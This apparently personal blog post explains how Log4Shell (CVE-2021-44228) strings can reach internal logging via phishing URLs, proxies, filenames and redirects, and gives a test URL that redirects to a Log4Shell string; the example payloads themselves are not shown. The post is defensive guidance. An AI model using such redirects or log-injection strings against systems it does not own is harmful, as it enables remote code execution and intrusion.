Log4Shell and LogJam are the names for a Log4j vulnerability.
Log4j is a logging library for Java that was patched on 2021-12-06 and extensively exploited from 2021-12-10 (so not a zero-day!) as the news of the vulnerability travelled.
The vulnerability, with the CVE designation CVE-2021-44228, is far-reaching as Log4j is a very popular logging library and Java is everywhere.
I highly recommend checking out Microsoft’s blog post, particularly the succinct list of workarounds if you can’t patch.
So, while externally-facing visible infrastructure is an obvious first choice to investigate and remediate, don’t overlook what’s possible from your network.
There are many devices and client applications that users and systems interact with as their connections transverse and exit your network. Consider proxies, mail gateways, and security tooling.
Imagine a phishing email containing the following link 1:
It’s Google, right? It’s fine. Except, that entire URL could get logged in a host-based web monitoring tool (anti-virus or similar), logged as it goes out via a proxy, or when the proxy or host-based tool sends its logs to the security information and event management (SIEM) tool.
Files and attachments could get logged to a system, either directly through the operating system or through host-based monitoring (although, I would be quite surprised if something decided to URL decoded a filename before logging).
Redirected URLs or chained cross-site scripting (XSS) could lead to a malicious URL being visited and again picked up by host or network monitoring.
For example, https://olliejc.uk/web-testing?test=9ced-1bdade435376 redirects to a URL with a Log4shell string in.
Do not discount your internal network, infrastructure and services.
As soon as you’re reasonably confident you’ve patched and mitigated public components or when you’re waiting on suppliers and vendors, get started on applying updates and patches for all your internal software.
To help discover what your supply chain are saying, there’s a great resource of vendors and providers bulletins being curated by @SwitHak on GitHub:
Thanks for reading!
1 To save you the hassle of running that string through CyberChef it URL decodes to:
Which in turn would get expanded to the following on a vulnerable component: